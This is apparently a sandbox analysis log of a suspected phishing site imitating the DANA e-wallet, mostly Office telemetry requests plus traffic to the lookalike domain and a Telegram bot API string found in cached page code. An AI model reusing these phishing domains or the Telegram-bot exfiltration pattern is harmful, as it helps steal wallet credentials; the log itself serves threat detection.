Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/hero.svg HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_text.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/bi.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/kom.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_logo.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_bg.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://penukran-poin-dana.aktsx.cfd/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/kom.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/bi.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/hero.svg HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/dana_text.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /asset/img/load_spin.png HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: penukran-poin-dana.aktsx.cfdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: penukran-poin-dana.aktsx.cfd
Source: global trafficDNS traffic detected: DNS query: unpkg.com
Source: global trafficDNS traffic detected: DNS query: dev-danapemulihan.pantheonsite.io
Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: www.dana.id
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 57063Cache-Control: public, max-age=600Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://dev-danapemulihan.pantheonsite.io/wp-json/>; rel="https://api.w.org/"Server: nginxStrict-Transport-Security: max-age=300X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-d4wlzX-Styx-Req-Id: 21c02976-83d9-11ef-b28b-da76a97beae0Date: Sun, 06 Oct 2024 11:50:07 GMTX-Served-By: cache-chi-klot8100053-CHI, cache-ewr-kewr1740055-EWRX-Cache: MISS, MISSX-Cache-Hits: 0, 0X-Timer: S1728215407.896300,VS0,VE179Vary: Accept-Encoding, Cookie, CookieX-Robots-Tag: noindexAge: 0Accept-Ranges: bytesVia: 1.1 varnish, 1.1 varnish
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 57063Cache-Control: public, max-age=600Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://dev-danapemulihan.pantheonsite.io/wp-json/>; rel="https://api.w.org/"Server: nginxStrict-Transport-Security: max-age=300X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-d4wlzX-Styx-Req-Id: 21c02976-83d9-11ef-b28b-da76a97beae0Date: Sun, 06 Oct 2024 11:50:32 GMTX-Served-By: cache-chi-klot8100053-CHI, cache-nyc-kteb1890058-NYCX-Cache: HIT, MISSX-Cache-Hits: 1, 0X-Timer: S1728215433.958219,VS0,VE23Vary: Accept-Encoding, Cookie, CookieX-Robots-Tag: noindexAge: 26Accept-Ranges: bytesVia: 1.1 varnish, 1.1 varnish
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 57063Cache-Control: public, max-age=600Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://dev-danapemulihan.pantheonsite.io/wp-json/>; rel="https://api.w.org/"Server: nginxStrict-Transport-Security: max-age=300X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-d4wlzX-Styx-Req-Id: 21c02976-83d9-11ef-b28b-da76a97beae0Date: Sun, 06 Oct 2024 11:50:36 GMTX-Served-By: cache-chi-klot8100053-CHI, cache-ewr-kewr1740036-EWRX-Cache: MISS, HITX-Cache-Hits: 0, 1X-Timer: S1728215436.370588,VS0,VE3Vary: Accept-Encoding, Cookie, CookieX-Robots-Tag: noindexAge: 29Accept-Ranges: bytesVia: 1.1 varnish, 1.1 varnish
Source: chromecache_85.2.drString found in binary or memory: https://a.bsite.net/footer.js
Source: chromecache_85.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
Source: chromecache_84.2.dr, chromecache_115.2.drString found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWg2Gu-OJgBB04_6jT0WUgRXWLn5YbRSrznAuun2U
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYR
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0
Source: chromecache_85.2.drString found in binary or memory: https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid9dARAQbMu1UTEgpOfyH6pn4eI3_XArbELp_8lfZ
